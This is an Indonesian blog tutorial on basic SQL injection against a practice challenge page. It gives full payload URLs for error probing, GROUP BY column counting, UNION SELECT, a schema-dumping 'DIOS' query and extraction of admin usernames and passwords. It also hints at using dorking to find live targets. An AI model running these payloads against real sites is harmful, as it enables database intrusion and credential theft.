Sql Injection Basic 1 ( Sqli Paling Dasar )

Lets Go Langsung saja gan ;)
yang mendasari ane share teknik ini karena simple dan mudah juga untuk mendapatkan
target yang didorking :D pastinya cuma buat pelajaran doang gak ada yang lain ;)

just for inject not for deface ;)
hanya untuk memecahkan suatu masalah yang kita sering alami ketika mengexploitasi ;) haha

ini tutorial paling dasar untuk belajar sql injection ;)

disini kita sekalian belajar dari live target yang ada ;)
sqli ninja :D

here the link ;) challenge

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1

Sql Injection Basic 1 ( Sqli Paling Dasar  )

penampakan target masih baik2 sebelum di tambah code injeksi :P
ok mari kita tambahkan code injeksinya ( ' ) tanpa tanda kurung
jika muncul error , crash , forbidden, redirected , itu bisa jadi vuln

Sql Injection Basic 1 ( Sqli Paling Dasar  ) - Gnoobz.id

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'

tara tara tara error dan ini lah salah satu contoh vuln dalam sql injection
ok mari kita lanjut untuk mendapatkan table nya ...

disini ane menggunakan group by agar lebih cepat proses pencariiannya
jika tidak muncul pakai group by ,, pakai order by cari manual :P kwkw

Sql Injection Basic 1 ( Sqli Paling Dasar  ) - Gnoobz.id

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+GROUP+BY+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100-- +

jelas terlihat hanya ada 3 tables disitu
karena dalam bahasa asingnya wkwk Unknown column '4' in 'group statement'
Unknown column '4' in 'group statement' << tidak di temukan kolom ke 4

next step kita lanjut ke pencarian kolom renang wkwk.. dimana angka angka togel bertebaran a.k.a letak vuln wkkwkw

Sql Injection Basic 1 ( Sqli Paling Dasar  ) - Gnoobz.id

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' union select 1,2,3-- +

tara angka togel muncul... gimana bang kalau angka togel gak muncul ?
oops di simpan dulu tutorialnya keep stay diblog ini :P
nanti ku share kok...

ok lanjut
biar gak ribet2 kaya di tutor2 blog2 sebelah dan bertebaran di google
langsung aja di DIOS. waduh DIOS itu gimana bang :D
simple lihat aja nanti :P langsung get table + coloumn kok ;)
jadi gak ribet2 lagi ... ingat hanya yang modified saja ;)
klik aja disini untuk tutorial tentang hackbarnya Download Hackbar Modified

Sql Injection Basic 1 ( Sqli Paling Dasar  ) - Gnoobz.id

 http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' union select 1,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),3-- +

tara ane menggunakan dios by madblood :P
cara gunainnya gimana ?
klik UNION BASED - DIOS MYSQL - Pilih dah Macam2 Diosnya

 itu table + columnnya mana bang ?
itu sudah terlihat jelas
di baris pertama sebelum ( : ) tanpa tanda kurung.. itu adalah tablenya
dan sesudah ( : ) tanpa tanda kurung itu adalah columnnya

selanjutnya tinggak lihat dah apa yang kita inginkan ... disini ane cuma mau get user + pass admin doang kwkw..

Sql Injection Basic 1 ( Sqli Paling Dasar  ) - Gnoobz.id

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1%27%20union%20select%201,concat(username,0x3a3a,password),3%20from%20users--%20+

nah sip dah muncul kan tuh user dan passnya :D
sqli tingkat dasar sudah terselesaikan tinggal kalian pahami lagi aja ;)
ada pertanyaan silahkan komen saja...

salam hangat : Human Edo Tensei